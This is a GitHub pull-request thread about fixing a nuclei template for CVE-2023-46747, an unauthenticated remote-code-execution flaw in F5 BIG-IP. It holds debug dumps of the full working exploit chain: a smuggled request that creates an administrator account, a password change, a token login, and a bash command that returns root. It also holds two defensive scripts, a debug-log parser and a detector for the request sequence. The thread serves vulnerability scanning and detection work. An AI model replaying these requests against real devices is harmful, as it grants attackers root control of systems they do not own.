Fix CVE-2023-46747.yaml #8500
Hello @0xorOne, I've updated the template with the Please check and let us know if the updated template works for you. Hopefully, this will solve the issue you are facing.
Thanks for your reply. I found that when sending the /mgmt/tm/auth/user/{} packet through nuclei, the returned content will be 401.
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/mgmt/tm/auth/user/9HIHP
HTTP/1.1 401 F5 Authorization Required
Connection: close
Content-Length: 381
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 31 Oct 2023 17:56:43 GMT
Server: Apache
Strict-Transport-Security: max-age=16070400; includeSubDomains
Www-Authenticate: Basic realm="Enterprise Manager"
X-Frame-Options: SAMEORIGIN
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>401 Unauthorized</title>
</head><body>
<h1>Unauthorized</h1>
<p>This server could not verify that you
are authorized to access the document
requested. Either you supplied the wrong
credentials (e.g., bad password), or your
browser doesn't understand how to supply
the credentials required.</p>
</body></html>
Why do you need to request /mgmt/tm/auth/user/{} to change the password?
nuclei -duc -ni -t CVE-2023-46747.yaml -u https://192.168.166.189 -vv -debug
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.0.2
projectdiscovery.io
[INF] Current nuclei version: v3.0.2 (outdated)
[INF] Current nuclei-templates version: v9.6.8 (latest)
[INF] New templates added in latest release: 79
[INF] Templates loaded for current scan: 1
[WRN] Executing 1 unsigned templates. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2023-46747] F5 BIG-IP - Unauthenticated RCE via AJP Smuggling (@iamnoooob,@rootxharsh,@pdresearch) [critical]
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/tmui/login.jsp
POST /tmui/login.jsp HTTP/1.1
Host: 192.168.166.189
Transfer-Encoding: chunked, chunked
Content-Type: application/x-www-form-urlencoded
204
HTTP/1.1/tmui/Control/form 127.0.0.1 localhost localhostP
Tmui-Dubbuf
BBBBBBBBBBB
REMOTEROLE0
localhostadminq_timenow=a&_timenow_before=&handler=%2ftmui%2fsystem%2fuser%2fcreate&&&form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp%3f&form_page_before=&hideObjList=&_bufvalue=eIL4RUnSwXYoPUIOGcOFx2o00Xc%3d&_bufvalue_before=&systemuser-hidden=[["Administrator","[All]"]]&systemuser-hidden_before=&name=1U5QN&name_before=&passwd=qUXSXxhSu3et&passwd_before=&finished=x&finished_before=
0
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/tmui/login.jsp
HTTP/1.1 200 OK
Content-Length: 7019
Cache-Control: no-cache, must-revalidate, no-store
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data: http://127.4.1.1 http://127.4.2.1
Content-Type: text/html;charset=utf-8
Date: Tue, 31 Oct 2023 18:15:37 GMT
F5-Login-Page: true
Pragma: no-cache, no-cache
Server: Apache
Set-Cookie: JSESSIONID=78pyut1qvoLQxqE5haROGRutLUtqehoz; Path=/tmui; Secure; HttpOnly; SameSite=Strict
Strict-Transport-Security: max-age=16070400; includeSubDomains
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/mgmt/tm/auth/user/1U5QN
PATCH /mgmt/tm/auth/user/1U5QN HTTP/1.1
Host: 192.168.166.189
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Connection: close
Content-Length: 32
Authorization: Basic MVU1UU46cVVYU1h4aFN1M2V0
Content-Type: application/json
Accept-Encoding: gzip
{"password": "MjDWOJ3sHEYm79"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/mgmt/tm/auth/user/1U5QN
HTTP/1.1 401 F5 Authorization Required
Connection: close
Content-Length: 381
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 31 Oct 2023 18:15:37 GMT
Server: Apache
Strict-Transport-Security: max-age=16070400; includeSubDomains
Www-Authenticate: Basic realm="Enterprise Manager"
X-Frame-Options: SAMEORIGIN
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>401 Unauthorized</title>
</head><body>
<h1>Unauthorized</h1>
<p>This server could not verify that you
are authorized to access the document
requested. Either you supplied the wrong
credentials (e.g., bad password), or your
browser doesn't understand how to supply
the credentials required.</p>
</body></html>
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/mgmt/shared/authn/login
POST /mgmt/shared/authn/login HTTP/1.1
Host: 192.168.166.189
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Content-Length: 51
Content-Type: application/json
Accept-Encoding: gzip
{"username":"1U5QN", "password":"MjDWOJ3sHEYm79"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/mgmt/shared/authn/login
HTTP/1.1 401 F5 Authorization Required
Connection: close
Content-Length: 129
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: must-revalidate
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data: http://127.4.1.1 http://127.4.2.1
Content-Type: application/json; charset=UTF-8
Date: Tue, 31 Oct 2023 18:15:40 GMT
Expires: -1
Pragma: no-cache
Server: Jetty(9.2.22.v20170606)
Strict-Transport-Security: max-age=16070400; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block
{"code":401,"message":"Authentication failed.","referer":"192.168.166.168","restOperationId":7158601,"kind":":resterrorresponse"}
[WRN] [CVE-2023-46747] Could not make http request for https://192.168.166.189: unresolved variables found: token
[INF] No results found. Better luck next time!
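A small parser for the `-debug` output above, added here as an example (it is not part of the PR or of nuclei): it pairs each dumped request with its response status and shows that the `unresolved variables found: token` warning is a downstream symptom of the earlier 401 on the PATCH step. The function names are this example's own, and the sample is abridged from the output above.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

# Marker lines exactly as they appear in the nuclei -debug output quoted in this thread.
REQ_MARK = re.compile(r"^\[INF\] \[[^\]]+\] Dumped HTTP request for (\S+)")
RESP_MARK = re.compile(r"^\[DBG\] \[[^\]]+\] Dumped HTTP response (\S+)")
REQ_LINE = re.compile(r"^([A-Z]+) (\S+) HTTP/\d\.\d$")
STATUS_LINE = re.compile(r"^HTTP/\d\.\d (\d{3})\b")
UNRESOLVED = re.compile(r"unresolved variables found: (.+)$")


@dataclass
class Step:
    method: str
    path: str
    status: Optional[int] = None


def parse_debug(text: str) -> Tuple[List[Step], List[str]]:
    """Return the request/response steps and any unresolved template variables."""
    steps: List[Step] = []
    unresolved: List[str] = []
    pending = None   # "request" or "response": which first line we are waiting for
    resp_url = ""
    for raw in text.splitlines():
        line = raw.strip()
        if REQ_MARK.match(line):
            pending = "request"
            continue
        m = RESP_MARK.match(line)
        if m:
            pending, resp_url = "response", m.group(1)
            continue
        m = UNRESOLVED.search(line)
        if m:
            unresolved.extend(v.strip() for v in m.group(1).split(","))
            continue
        if pending == "request":
            m = REQ_LINE.match(line)
            if m:
                steps.append(Step(m.group(1), m.group(2)))
                pending = None
        elif pending == "response":
            m = STATUS_LINE.match(line)
            if m:
                if not steps or steps[-1].status is not None:
                    # A response pasted without its request: keep it, method unknown.
                    steps.append(Step("?", urlsplit(resp_url).path))
                steps[-1].status = int(m.group(1))
                pending = None
    return steps, unresolved


def first_failure(steps: List[Step]) -> Optional[Step]:
    """First step whose response status is 4xx/5xx, or None."""
    return next((s for s in steps if s.status is not None and s.status >= 400), None)


def diagnose(text: str) -> str:
    steps, unresolved = parse_debug(text)
    failed = first_failure(steps)
    if failed is None:
        return "all dumped requests succeeded"
    msg = f"{failed.method} {failed.path} returned {failed.status}"
    if unresolved:
        msg += "; later steps never resolved: " + ", ".join(unresolved)
    return msg


# Abridged from the first debug run in this thread (headers and bodies omitted).
SAMPLE = """\
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/tmui/login.jsp
POST /tmui/login.jsp HTTP/1.1
Host: 192.168.166.189
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/tmui/login.jsp
HTTP/1.1 200 OK
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/mgmt/tm/auth/user/1U5QN
PATCH /mgmt/tm/auth/user/1U5QN HTTP/1.1
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/mgmt/tm/auth/user/1U5QN
HTTP/1.1 401 F5 Authorization Required
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/mgmt/shared/authn/login
POST /mgmt/shared/authn/login HTTP/1.1
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/mgmt/shared/authn/login
HTTP/1.1 401 F5 Authorization Required
[WRN] [CVE-2023-46747] Could not make http request for https://192.168.166.189: unresolved variables found: token
"""

if __name__ == "__main__":
    print(diagnose(SAMPLE))
```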
I fixed the problem and made some more modifications; it should now work.
The vulnerability can be detected by changing pass to password2.

POST /mgmt/shared/authn/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"username":"{{hex_decode(username)}}", "password":"{{password2}}"}

nuclei -duc -ni -t CVE-2023-46747.yaml -u https://192.168.166.189 -vv -debug
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.0.2
projectdiscovery.io
[INF] Current nuclei version: v3.0.2 (outdated)
[INF] Current nuclei-templates version: v9.6.8 (latest)
[INF] New templates added in latest release: 79
[INF] Templates loaded for current scan: 1
[WRN] Executing 1 unsigned templates. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2023-46747] F5 BIG-IP - Unauthenticated RCE via AJP Smuggling (@iamnoooob,@rootxharsh,@pdresearch) [critical]
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/tmui/login.jsp
POST /tmui/login.jsp HTTP/1.1
Host: 192.168.166.189
Transfer-Encoding: chunked, chunked
Content-Type: application/x-www-form-urlencoded
204
HTTP/1.1/tmui/Control/form 127.0.0.1 localhost localhostP
Tmui-Dubbuf
BBBBBBBBBBB
REMOTEROLE0
localhostadminq_timenow=a&_timenow_before=&handler=%2ftmui%2fsystem%2fuser%2fcreate&&&form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp%3f&form_page_before=&hideObjList=&_bufvalue=eIL4RUnSwXYoPUIOGcOFx2o00Xc%3d&_bufvalue_before=&systemuser-hidden=[["Administrator","[All]"]]&systemuser-hidden_before=&name=mU7ML&name_before=&passwd=YyOGqpN7Zyxs&passwd_before=&finished=x&finished_before=
0
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/tmui/login.jsp
HTTP/1.1 200 OK
Content-Length: 7019
Cache-Control: no-cache, must-revalidate, no-store
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data: http://127.4.1.1 http://127.4.2.1
Content-Type: text/html;charset=utf-8
Date: Tue, 31 Oct 2023 18:31:00 GMT
F5-Login-Page: true
Pragma: no-cache, no-cache
Server: Apache
Set-Cookie: JSESSIONID=A5bkD6xm5AXk0r3Cha8Bqx2pWlla5A3C; Path=/tmui; Secure; HttpOnly; SameSite=Strict
Strict-Transport-Security: max-age=16070400; includeSubDomains
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/mgmt/tm/auth/user/mU7ML
PATCH /mgmt/tm/auth/user/mU7ML HTTP/1.1
Host: 192.168.166.189
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Connection: close
Content-Length: 32
Authorization: Basic bVU3TUw6WXlPR3FwTjdaeXhz
Content-Type: application/json
Accept-Encoding: gzip
{"password": "UIDd4ZMa0TpgvM"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/mgmt/tm/auth/user/mU7ML
HTTP/1.1 401 F5 Authorization Required
Connection: close
Content-Length: 381
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 31 Oct 2023 18:31:00 GMT
Server: Apache
Strict-Transport-Security: max-age=16070400; includeSubDomains
Www-Authenticate: Basic realm="Enterprise Manager"
X-Frame-Options: SAMEORIGIN
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>401 Unauthorized</title>
</head><body>
<h1>Unauthorized</h1>
<p>This server could not verify that you
are authorized to access the document
requested. Either you supplied the wrong
credentials (e.g., bad password), or your
browser doesn't understand how to supply
the credentials required.</p>
</body></html>
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/mgmt/shared/authn/login
POST /mgmt/shared/authn/login HTTP/1.1
Host: 192.168.166.189
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Connection: close
Content-Length: 51
Content-Type: application/json
Accept-Encoding: gzip
{"username":"mU7ML", "password":"UIDd4ZMa0TpgvM"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/mgmt/shared/authn/login
HTTP/1.1 401 F5 Authorization Required
Connection: close
Content-Length: 129
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: must-revalidate
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data: http://127.4.1.1 http://127.4.2.1
Content-Type: application/json; charset=UTF-8
Date: Tue, 31 Oct 2023 18:31:02 GMT
Expires: -1
Pragma: no-cache
Server: Jetty(9.2.22.v20170606)
Strict-Transport-Security: max-age=16070400; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block
{"code":401,"message":"Authentication failed.","referer":"192.168.166.168","restOperationId":7173213,"kind":":resterrorresponse"}
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/mgmt/tm/util/bash
POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.166.189
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
Connection: close
Content-Length: 41
Content-Type: application/json
X-F5-Auth-Token: {{token}}
Accept-Encoding: gzip
{"command":"run","utilCmdArgs":"-c id"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/mgmt/tm/util/bash
HTTP/1.1 401 F5 Authorization Required
Connection: close
Content-Length: 138
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: must-revalidate
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data: http://127.4.1.1 http://127.4.2.1
Content-Type: application/json; charset=UTF-8
Date: Tue, 31 Oct 2023 18:31:05 GMT
Expires: -1
Pragma: no-cache
Server: Jetty(9.2.22.v20170606)
Strict-Transport-Security: max-age=16070400; includeSubDomains
Www-Authenticate: X-Auth-Token
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block
{"code":401,"message":"X-F5-Auth-Token does not exist.","referer":"192.168.166.168","restOperationId":7173267,"kind":":resterrorresponse"}
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/mgmt/tm/auth/user/mU7ML
PATCH /mgmt/tm/auth/user/mU7ML HTTP/1.1
Host: 192.168.166.189
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Connection: close
Content-Length: 32
Authorization: Basic bVU3TUw6WXlPR3FwTjdaeXhz
Content-Type: application/json
Accept-Encoding: gzip
{"password": "UIDd4ZMa0TpgvM"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/mgmt/tm/auth/user/mU7ML
HTTP/1.1 200 OK
Connection: close
Content-Length: 470
Allow:
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: must-revalidate
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data: http://127.4.1.1 http://127.4.2.1
Content-Type: application/json; charset=UTF-8
Date: Tue, 31 Oct 2023 18:31:05 GMT
Expires: -1
Pragma: no-cache
Server: Jetty(9.2.22.v20170606)
Set-Cookie: BIGIPAuthCookie=alt65Iq5DAZmNaSRGBKZgf4Bxu69NSwzKVTUgnSR; path=/; Secure; HttpOnly; SameSite=Strict
Set-Cookie: BIGIPAuthUsernameCookie=mU7ML; path=/; Secure; HttpOnly; SameSite=Strict
Strict-Transport-Security: max-age=16070400; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block
{"kind":"tm:auth:user:userstate","name":"mU7ML","fullPath":"mU7ML","generation":592,"selfLink":"https://localhost/mgmt/tm/auth/user/mU7ML?ver=16.1.2.1","description":"mU7ML","encryptedPassword":"$6$eU8w/fCj$nJOsAUVfz14gPObNWXYt3/Ob7uyDVvC2qzVgxccdz8O6Z4E99ndn.fjFV.43nhDBfFyy1B/mKt3DS0zVrRphj0","sessionLimit":-1,"partitionAccess":[{"name":"all-partitions","role":"admin","nameReference":{"link":"https://localhost/mgmt/tm/auth/partition/all-partitions?ver=16.1.2.1"}}]}
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/mgmt/shared/authn/login
POST /mgmt/shared/authn/login HTTP/1.1
Host: 192.168.166.189
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 51
Content-Type: application/json
Accept-Encoding: gzip
{"username":"mU7ML", "password":"UIDd4ZMa0TpgvM"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/mgmt/shared/authn/login
HTTP/1.1 200 OK
Connection: close
Content-Length: 713
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: must-revalidate
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data: http://127.4.1.1 http://127.4.2.1
Content-Type: application/json; charset=UTF-8
Date: Tue, 31 Oct 2023 18:31:05 GMT
Expires: -1
Pragma: no-cache
Server: Jetty(9.2.22.v20170606)
Strict-Transport-Security: max-age=16070400; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block
{"username":"mU7ML","loginReference":{"link":"https://localhost/mgmt/cm/system/authn/providers/local/login"},"loginProviderName":"local","token":{"token":"YTVLM4QBUL7XC5GU7V4WZPOVBA","name":"YTVLM4QBUL7XC5GU7V4WZPOVBA","userName":"mU7ML","authProviderName":"local","user":{"link":"https://localhost/mgmt/shared/authz/users/mU7ML"},"groupReferences":[],"timeout":1200,"startTime":"2023-10-31T11:31:06.060-0700","address":"192.168.166.168","partition":"[All]","generation":1,"lastUpdateMicros":1698777066060230,"expirationMicros":1698778266060000,"kind":"shared:authz:tokens:authtokenitemstate","selfLink":"https://localhost/mgmt/shared/authz/tokens/YTVLM4QBUL7XC5GU7V4WZPOVBA"},"generation":0,"lastUpdateMicros":0}
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/mgmt/tm/util/bash
POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.166.189
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
Connection: close
Content-Length: 41
Content-Type: application/json
X-F5-Auth-Token: YTVLM4QBUL7XC5GU7V4WZPOVBA
Accept-Encoding: gzip
{"command":"run","utilCmdArgs":"-c id"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/mgmt/tm/util/bash
HTTP/1.1 200 OK
Connection: close
Content-Length: 167
Allow:
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: must-revalidate
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data: http://127.4.1.1 http://127.4.2.1
Content-Type: application/json; charset=UTF-8
Date: Tue, 31 Oct 2023 18:31:06 GMT
Expires: -1
Pragma: no-cache
Server: Jetty(9.2.22.v20170606)
Strict-Transport-Security: max-age=16070400; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block
{"kind":"tm:util:bash:runstate","command":"run","utilCmdArgs":"-c id","commandResult":"uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0\n"}
[CVE-2023-46747:word-1] [http] [critical] https://192.168.166.189/mgmt/tm/util/bash [uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0\n,Username:mU7ML,Password:YyOGqpN7Zyxs,Token:YTVLM4QBUL7XC5GU7V4WZPOVBA] [pass="YyOGqpN7Zyxs"]
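A log-correlation heuristic for the request sequence visible in the debug output above, added here as an example and not part of the PR or the nuclei project: it flags a client that gets a 200 on `POST /tmui/login.jsp`, a user `PATCH`, a REST login and a `/mgmt/tm/util/bash` call, in that order, within a short window. The one-line log format, the 30-second window, the second client address and the function names are assumptions of this example; map them to whatever your BIG-IP or fronting proxy actually records.

```python
import re
from datetime import datetime

# Assumed log format for this example:
#   "<UTC timestamp> <client ip> <method> <path> <status>"
LINE_RE = re.compile(r"^(\S+) (\S+) ([A-Z]+) (\S+) (\d{3})$")

# Ordered stages, taken from the request sequence in the debug output above.
STAGES = [
    ("POST", re.compile(r"^/tmui/login\.jsp(\?|$)")),
    ("PATCH", re.compile(r"^/mgmt/tm/auth/user/[^/]+$")),
    ("POST", re.compile(r"^/mgmt/shared/authn/login$")),
    ("POST", re.compile(r"^/mgmt/tm/util/bash$")),
]


def matches(stage, method, path):
    return stage[0] == method and stage[1].match(path) is not None


def detect(lines, window=30):
    """Return one alert per client that completes all stages within `window` seconds."""
    state = {}    # client ip -> [time of stage 0, index of next expected stage]
    alerts = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
        src, method, path = m.group(2), m.group(3), m.group(4)
        if int(m.group(5)) != 200:
            continue   # 401 attempts, as seen in the thread, do not advance the chain
        if matches(STAGES[0], method, path):
            state[src] = [ts, 1]       # (re)start the chain for this client
            continue
        if src not in state:
            continue
        start, idx = state[src]
        if (ts - start).total_seconds() > window:
            del state[src]             # too slow to be one automated run
            continue
        if matches(STAGES[idx], method, path):
            idx += 1
            if idx == len(STAGES):
                alerts.append({
                    "src": src,
                    "first_seen": start,
                    "last_seen": ts,
                    "seconds": int((ts - start).total_seconds()),
                })
                del state[src]
            else:
                state[src][1] = idx
    return alerts


# Constructed sample: the first client follows the order and timing of the
# second debug run above; 10.0.0.5 is a made-up admin using the REST API only.
SAMPLE_LOG = """\
2023-10-31T18:31:00Z 192.168.166.168 POST /tmui/login.jsp 200
2023-10-31T18:31:00Z 192.168.166.168 PATCH /mgmt/tm/auth/user/mU7ML 401
2023-10-31T18:31:02Z 192.168.166.168 POST /mgmt/shared/authn/login 401
2023-10-31T18:31:05Z 192.168.166.168 POST /mgmt/tm/util/bash 401
2023-10-31T18:31:05Z 192.168.166.168 PATCH /mgmt/tm/auth/user/mU7ML 200
2023-10-31T18:31:05Z 192.168.166.168 POST /mgmt/shared/authn/login 200
2023-10-31T18:31:06Z 192.168.166.168 POST /mgmt/tm/util/bash 200
2023-10-31T18:40:00Z 10.0.0.5 POST /mgmt/shared/authn/login 200
2023-10-31T18:40:01Z 10.0.0.5 POST /mgmt/tm/util/bash 200
"""

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```

Any hit should be followed by a review of local user accounts on the device, since the chain starts with the creation of a new administrator.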
Hi @0xorOne, It was just in the original template in this manner, but it did not work in your situation because the 2nd request for password change did not work for you. As I can see in the shared debug data, the updated template is working fine for you; we can now merge the changes.
Thank you for your response.
Hello @0xorOne, We appreciate your efforts in updating the template and making it more suitable. Your contribution has been truly valuable to us. Cheers! 🍻 You can join our Discord server. It's a great place to connect with fellow contributors and stay updated with the latest developments. Thank you once again.